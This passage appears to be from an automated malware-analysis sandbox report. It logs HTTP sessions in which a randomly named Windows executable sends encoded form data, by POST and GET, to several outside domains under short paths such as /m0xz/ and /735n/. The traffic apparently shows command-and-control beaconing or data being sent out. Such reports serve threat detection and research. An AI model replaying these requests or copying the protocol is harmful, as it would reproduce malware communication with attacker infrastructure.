                                                      Data Ascii: MICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oivS3QUbCmDlcGNOGnni6Pnb7jthxAWtAk1rHLK6riB2G7VddZvsxBsNeCF6Ix%2BLxtMbV3u7IcCio4JrsYuVeHcQu993UuLXfxoTXO0j6uvB8Ud8iO%2FKGMbUPWQGbn8qChyhhWsc"}],"group":"cf-nel"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.44975823.227.38.74803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:39.389699936 CEST420OUTGET /k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:39.906347036 CEST1236INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 03 Jul 2024 15:45:39 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      X-Storefront-Renderer-Rendered: 1
                                                      location: https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4
                                                      x-redirect-reason: https_required
                                                      x-frame-options: DENY
                                                      content-security-policy: frame-ancestors 'none';
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      vary: Accept
                                                      powered-by: Shopify
                                                      server-timing: processing;dur=12, db;dur=5, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="2s2z", requestID;desc="80f838bb-2b2b-414d-947c-0caeeb6ff3af-1720021539"
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      x-request-id: 80f838bb-2b2b-414d-947c-0caeeb6ff3af-1720021539
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUec2VsXevJAwVxwoAVNxq5IKyHajpOXlqxRAdEvQQOxZp2b2q7K1R%2F%2F8adKhn7wY1BshXzZ%2B35SmPeRAbC%2BhCsO2jdDFZqAqYk4xus%2BH1Ei25EeHutMudj0gTYjwbSPtwfZhToP"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"succ
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:39.906388998 CEST328INData Raw: 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74
                                                      Data Ascii: ss_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=61.999798X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenSe


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.449759172.67.137.15803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:44.956773043 CEST682OUTPOST /m0xz/ HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.hissmjkl.com
                                                      Referer: http://www.hissmjkl.com/m0xz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 72 56 4c 43 4e 33 55 67 48 78 36 5a 31 44 61 43 67 6c 35 77 6a 74 63 52 75 52 35 66 48 59 6f 4f 66 53 73 56 48 45 57 57 63 61 64 51 4a 66 71 4f 46 48 78 77 69 33 5a 6c 36 59 56 44 6c 4a 70 35 69 39 37 30 39 72 39 42 46 48 73 62 48 6c 46 73 68 56 78 4e 7a 4a 6e 37 69 63 57 7a 38 67 66 41 49 77 47 4d 33 49 42 6c 68 4d 49 62 62 50 52 2f 45 6c 58 49 32 30 4d 5a 48 64 38 39 51 39 66 5a 37 2f 39 71 54 55 34 6d 44 68 65 4e 69 69 63 55 51 4b 73 6c 55 61 78 38 4b 63 52 32 2f 76 54 49 42 53 50 4c 35 79 76 30 34 47 52 7a 6f 33 6b 6c 2b 63 77 6c 45 38 31 43 59 76 41 6e 41 49 55 45 76 51 3d 3d
                                                      Data Ascii: lxRlvTSh=rVLCN3UgHx6Z1DaCgl5wjtcRuR5fHYoOfSsVHEWWcadQJfqOFHxwi3Zl6YVDlJp5i9709r9BFHsbHlFshVxNzJn7icWz8gfAIwGM3IBlhMIbbPR/ElXI20MZHd89Q9fZ7/9qTU4mDheNiicUQKslUax8KcR2/vTIBSPL5yv04GRzo3kl+cwlE81CYvAnAIUEvQ==
                                                      Jul 3, 2024 17:45:45.629235983 CEST853INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:45 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:45 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XFrXUQcFDDEiqb72IIX6SrlFe6lJzAA3y42PLVBB13qTJE17jWIDkCN%2FR%2Fs%2B28FN6pv3b0Eu1g0RD0JPfS8Dp3oDmJppFcRyROYAO6%2F3OA9YyrMYts3YDF7utPMW5aV4PiU"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d80122accd9e17-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.449760172.67.137.15803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:47.499368906 CEST702OUTPOST /m0xz/ HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.hissmjkl.com
                                                      Referer: http://www.hissmjkl.com/m0xz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 72 56 4c 43 4e 33 55 67 48 78 36 5a 31 6a 4b 43 69 47 52 77 6d 4e 63 51 69 78 35 66 4e 34 6f 43 66 53 77 56 48 41 50 4a 63 49 35 51 4d 4b 57 4f 43 47 78 77 6c 33 5a 6c 79 34 56 43 6d 35 70 6d 69 38 47 4a 39 71 42 42 46 48 34 62 48 67 35 73 68 6b 78 4f 7a 5a 6e 35 72 38 57 74 6a 51 66 41 49 77 47 4d 33 49 56 4c 68 4d 67 62 62 2f 68 2f 47 45 58 4a 36 55 4d 61 43 64 38 39 55 39 65 78 37 2f 39 59 54 57 4d 41 44 6a 6d 4e 69 6a 73 55 54 62 73 36 64 61 78 36 58 4d 51 59 7a 2b 4f 6b 4a 51 32 6f 6e 79 48 72 6c 45 6c 68 67 52 31 2f 76 74 52 79 57 38 52 78 46 6f 4a 54 4e 4c 70 4e 30 56 2f 66 45 59 54 41 68 6e 44 47 66 47 4c 32 53 4f 52 33 51 33 49 3d
                                                      Data Ascii: lxRlvTSh=rVLCN3UgHx6Z1jKCiGRwmNcQix5fN4oCfSwVHAPJcI5QMKWOCGxwl3Zly4VCm5pmi8GJ9qBBFH4bHg5shkxOzZn5r8WtjQfAIwGM3IVLhMgbb/h/GEXJ6UMaCd89U9ex7/9YTWMADjmNijsUTbs6dax6XMQYz+OkJQ2onyHrlElhgR1/vtRyW8RxFoJTNLpN0V/fEYTAhnDGfGL2SOR3Q3I=
                                                      Jul 3, 2024 17:45:48.166023016 CEST870INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:48 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:48 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZHcX112AokBwQdDEHKMaPkfF7gEUIi5z68v0aWSVGm9x9ZmoaSMKuuxK7p%2B%2F%2BX9VkxsGrJUXtDAY%2Fndyx8hn%2FXvZdDBN4UId9%2Fq2tYe%2BzlDhnRe7dhw%2BqTe%2BEJLOkS%2FNZ8O"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d801327fc78c2f-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.449761172.67.137.15803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:50.037710905 CEST10784OUTPOST /m0xz/ HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.hissmjkl.com
                                                      Referer: http://www.hissmjkl.com/m0xz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 72 56 4c 43 4e 33 55 67 48 78 36 5a 31 6a 4b 43 69 47 52 77 6d 4e 63 51 69 78 35 66 4e 34 6f 43 66 53 77 56 48 41 50 4a 63 49 78 51 4d 63 43 4f 45 6c 4a 77 6b 33 5a 6c 74 49 56 48 6d 35 6f 36 69 39 76 43 39 71 4e 2f 46 46 41 62 46 47 4e 73 32 47 4a 4f 34 5a 6e 35 70 38 57 73 38 67 66 76 49 77 57 41 33 49 46 4c 68 4d 67 62 62 38 70 2f 51 46 58 4a 34 55 4d 5a 48 64 38 35 51 39 66 63 37 2f 6c 49 54 57 4a 37 41 53 47 4e 69 44 38 55 44 39 59 36 63 36 78 34 45 38 51 32 7a 2b 43 37 4a 51 71 65 6e 79 44 4e 6c 48 35 68 6c 6d 63 57 36 75 31 72 50 39 56 77 46 6f 52 6e 55 36 4e 73 2b 6c 2f 45 46 71 48 69 39 58 48 5a 55 47 71 75 4f 4e 78 68 44 69 49 57 36 2f 74 4e 4d 6d 36 4f 74 49 79 78 77 47 70 6b 72 54 43 36 6f 33 2b 70 67 55 51 76 56 72 30 41 62 31 68 4c 57 42 38 31 6b 67 57 6e 45 48 34 70 31 67 78 43 5a 79 4d 4e 35 77 74 48 65 4d 50 6b 32 54 49 46 55 77 35 56 59 50 4e 55 34 65 42 34 59 31 5a 74 76 50 53 48 48 61 48 68 52 76 4a 47 4f 55 39 72 52 67 79 5a 39 4d 69 52 47 47 6a 50 56 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=rVLCN3UgHx6Z1jKCiGRwmNcQix5fN4oCfSwVHAPJcIxQMcCOElJwk3ZltIVHm5o6i9vC9qN/FFAbFGNs2GJO4Zn5p8Ws8gfvIwWA3IFLhMgbb8p/QFXJ4UMZHd85Q9fc7/lITWJ7ASGNiD8UD9Y6c6x4E8Q2z+C7JQqenyDNlH5hlmcW6u1rP9VwFoRnU6Ns+l/EFqHi9XHZUGquONxhDiIW6/tNMm6OtIyxwGpkrTC6o3+pgUQvVr0Ab1hLWB81kgWnEH4p1gxCZyMN5wtHeMPk2TIFUw5VYPNU4eB4Y1ZtvPSHHaHhRvJGOU9rRgyZ9MiRGGjPVN5zi506rN8GMRU3P9b+Y5jwnTJfW/vG+GNK1YbcQjS2i1XN4lv9XKLndDtHGxxBkIYCX4AYZzbXhZM+SOkwrLTz2v5jTaFrO/mqMQtXnlx7bVIdHEfaGZDqNPZx0rtDSFfyB7GLq+SDVhjyYNLLooi1z8Mi1XjJjalQI839hBXujwzy4tp2wP5vulkvcUV58oQ3ngvNqz+ZNMqjYjaLTXXs2e/f948D0EyXmqh40XHDqNXbvWhVoJzUijRSoq1j3hazPdOkPQrFv/6aV5K08KljSOW8DBJKYD9/JPZPn2sjnbk7ZQc2XzxZykszm/fX7/ndjxDkqGWwLbVAPxkGzsXVbA2qYlnImXnZqrPEdYkAOBzesiP0BkQC6BDhEZ1PIS5UgEM+ErqoBVQAiKKdEcxn3xCMuTQ9xSoZFHaJzRK6YZiljiA8Q3YHMdBTS+NkGgNYyPG/XurW8UYPFuqF7DFvz9i+Gun8hZrYxig2f+gV8IJfwbmKWO7UZrsy0TOpL7NqzmDCpmiZ2SPWJMkSvpiA9RNEpwuL6usw7QBB5EqbwHOEwGoBmjsDIMFvJofwxT/CE5P3G0coH93rq28+/KjhrCdmoBwfEH16RXcNxV0zWu3HVVxjERgEiX9wxxSgZ3Lw3rUWIVIfpmRBteRo2yqX6aD3T7SIPAW [TRUNCATED]
                                                      Jul 3, 2024 17:45:50.714649916 CEST854INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:50 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:50 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjArDonv2pTcI0hM0k0wREXanriOIzukuI%2FrN1I9O1lkIS%2FV1c8dp25Q8G96B08H9n9xe0DikIzMvdACYt3yj6uJyWHcHPsvuhMojXYyM2MhgBtGjd1BJNLN0u9gK4Z84euI"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d801426eb843f3-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.449762172.67.137.15803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:52.577670097 CEST416OUTGET /m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:53.264507055 CEST849INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:53 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:53 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vWFpWTfdjtGMBArT2pMmuXCyYhpQvxVmlwJcSJPG33KFzDIUm4xeRsWwzfio0JhhUGQq%2FBiMekIj2hpzm7n7EIZbB59Z3F2HJn%2Bdjp6xRnKcV%2FhoHx%2FMSXbTk8a3bgrLDMI"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d801524d917271-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                      Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                      Jul 3, 2024 17:45:53.264951944 CEST5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.44976346.30.211.38803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:58.405688047 CEST688OUTPOST /735n/ HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.monchosoft.com
                                                      Referer: http://www.monchosoft.com/735n/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 48 4c 6f 46 47 52 2b 51 34 47 47 4a 41 39 47 64 47 48 79 33 34 7a 49 4d 43 54 43 7a 55 47 61 59 77 64 66 46 34 2b 4b 36 56 4f 43 6d 63 34 69 50 71 4a 44 7a 44 75 4b 30 67 63 63 74 44 67 64 30 4b 2b 6c 76 57 75 6d 6f 72 5a 4a 2f 34 4c 79 6d 65 4e 68 6f 48 62 34 2b 59 6c 74 44 4b 70 62 4a 72 39 6d 42 44 63 42 57 7a 77 62 33 32 4a 31 79 4f 74 4c 6f 45 34 6f 53 56 58 35 2f 67 43 77 39 56 76 2b 30 61 2b 45 32 53 47 62 76 46 65 37 66 36 58 39 52 45 77 4b 54 53 62 62 65 51 45 67 56 4a 52 7a 2b 55 51 6d 2b 41 55 42 4c 2f 4b 6a 4e 59 46 71 64 47 4f 75 53 46 44 57 6c 77 6a 30 37 56 51 3d 3d
                                                      Data Ascii: lxRlvTSh=HLoFGR+Q4GGJA9GdGHy34zIMCTCzUGaYwdfF4+K6VOCmc4iPqJDzDuK0gcctDgd0K+lvWumorZJ/4LymeNhoHb4+YltDKpbJr9mBDcBWzwb32J1yOtLoE4oSVX5/gCw9Vv+0a+E2SGbvFe7f6X9REwKTSbbeQEgVJRz+UQm+AUBL/KjNYFqdGOuSFDWlwj07VQ==
                                                      Jul 3, 2024 17:45:59.050770044 CEST336INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:45:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.44976446.30.211.38803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:46:00.952377081 CEST708OUTPOST /735n/ HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.monchosoft.com
                                                      Referer: http://www.monchosoft.com/735n/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 48 4c 6f 46 47 52 2b 51 34 47 47 4a 41 63 32 64 41 51 75 33 36 54 49 4e 4e 7a 43 7a 66 6d 62 77 77 64 6a 46 34 38 6e 68 55 39 32 6d 63 5a 79 50 34 37 72 7a 4b 2b 4b 30 76 38 63 6f 48 67 64 2f 4b 2b 70 5a 57 71 75 6f 72 5a 64 2f 34 50 36 6d 64 36 56 6e 48 4c 34 38 4d 56 74 46 41 4a 62 4a 72 39 6d 42 44 63 56 6f 7a 30 2f 33 32 34 6c 79 42 6f 72 6e 4b 59 6f 52 46 48 35 2f 33 79 77 78 56 76 2b 47 61 2f 59 4d 53 45 6a 76 46 65 72 66 36 6d 38 48 4b 77 4b 52 57 62 61 37 52 45 42 53 4c 44 75 42 55 68 43 73 50 77 4e 74 33 73 79 58 4a 30 4c 4b 55 4f 4b 68 59 45 66 52 39 67 4a 79 4f 64 6e 57 6e 4b 6d 5a 77 79 59 53 2b 6e 49 6c 2b 52 62 34 70 58 34 3d
                                                      Data Ascii: lxRlvTSh=HLoFGR+Q4GGJAc2dAQu36TINNzCzfmbwwdjF48nhU92mcZyP47rzK+K0v8coHgd/K+pZWquorZd/4P6md6VnHL48MVtFAJbJr9mBDcVoz0/324lyBornKYoRFH5/3ywxVv+Ga/YMSEjvFerf6m8HKwKRWba7REBSLDuBUhCsPwNt3syXJ0LKUOKhYEfR9gJyOdnWnKmZwyYS+nIl+Rb4pX4=
                                                      Jul 3, 2024 17:46:01.591476917 CEST336INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:46:01 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
